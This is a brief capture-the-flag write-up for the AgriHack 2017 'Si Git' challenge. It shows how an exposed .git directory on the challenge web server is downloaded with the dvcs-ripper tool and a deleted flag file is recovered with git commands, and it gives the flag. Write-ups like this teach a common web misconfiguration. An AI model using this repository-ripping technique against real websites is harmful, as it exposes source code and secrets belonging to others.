[AgriHack 2017] Si Git (10 Points)

Find vulnerability

Found .git file

Exploit vulnerability

Download all git's repository content

$ perl /home/x7079/Private/tools/web/dvcs-ripper/rip-git.pl -v -u http://agrihack.p
arty:4000/.git

Recover deleted files using git checkout

$ git rev-list -n 1 HEAD -- flag.html     
$ git checkout c2a8e03fabc1e84b7bd9fd7fa944c01faf17d323^ -- flag.html

The flag is AGRI{jangan_pernah_meninggalkan_folder_git_di_server}.

Reference

• http://stackoverflow.com/questions/953481/find-and-restore-a-deleted-file-in-a-gi t-repository

Keywords git's forensic, information disclosure